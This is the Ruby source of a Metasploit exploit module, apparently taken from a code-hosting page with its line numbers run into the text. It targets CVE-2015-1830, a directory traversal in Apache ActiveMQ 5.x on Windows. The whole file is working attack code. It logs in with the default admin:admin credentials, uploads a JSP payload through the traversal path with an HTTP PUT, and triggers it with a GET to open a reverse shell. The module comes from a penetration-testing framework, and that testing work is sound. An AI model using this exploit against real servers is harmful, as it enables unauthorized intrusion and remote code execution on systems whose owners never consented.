Path: blob/master/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
32435 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',15'Description' => %q{16This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache17ActiveMQ 5.x before 5.11.2 for Windows.1819The module tries to upload a JSP payload to the /admin directory via the traversal20path /fileserver/..\admin\ using an HTTP PUT request with the default ActiveMQ21credentials admin:admin (or other credentials provided by the user). It then issues22an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the23payload and obtain a shell.24},25'Author' => [26'David Jorm', # Discovery and exploit27'Erik Wynter' # @wyntererik - Metasploit28],29'References' => [30[ 'CVE', '2015-1830' ],31[ 'EDB', '40857'],32[ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]33],34'Privileged' => false,35'Targets' => [36[37'Windows Java',38{39'Arch' => ARCH_JAVA,40'Platform' => 'win'41}42],43],44'DisclosureDate' => '2015-08-19',45'License' => MSF_LICENSE,46'DefaultOptions' => {47'RPORT' => 8161,48'PAYLOAD' => 'java/jsp_shell_reverse_tcp'49},50'DefaultTarget' => 0,51'Notes' => {52'Stability' => [ CRASH_SAFE ],53'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],54'Reliability' => [ REPEATABLE_SESSION ]55}56)57)5859register_options([60OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),61OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']),62OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),63OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])64])65end6667def check68print_status('Running check...')69testfile = Rex::Text.rand_text_alpha(10)70testcontent = Rex::Text.rand_text_alpha(10)7172send_request_cgi({73'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),74'headers' => {75'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])76},77'method' => 'PUT',78'data' => "<% out.println(\"#{testcontent}\");%>"79})8081res1 = send_request_cgi({82'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),83'headers' => {84'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])85},86'method' => 'GET'87})8889if res1 && res1.body.include?(testcontent)90send_request_cgi(91{92'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),93'headers' => {94'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])95},96'method' => 'DELETE'97},98199)100return Exploit::CheckCode::Vulnerable101end102103Exploit::CheckCode::Safe104end105106def exploit107print_status('Uploading payload...')108testfile = Rex::Text.rand_text_alpha(10)109vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") # This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.110111send_request_cgi({112'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),113'headers' => {114'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])115},116'method' => 'PUT',117'data' => payload.encoded118})119120print_status('Payload sent. Attempting to execute the payload.')121res = send_request_cgi({122'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),123'headers' => {124'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])125},126'method' => 'GET'127})128if res && res.code == 200129print_good('Payload executed!')130else131fail_with(Failure::PayloadFailed, 'Failed to execute the payload')132end133end134end135136137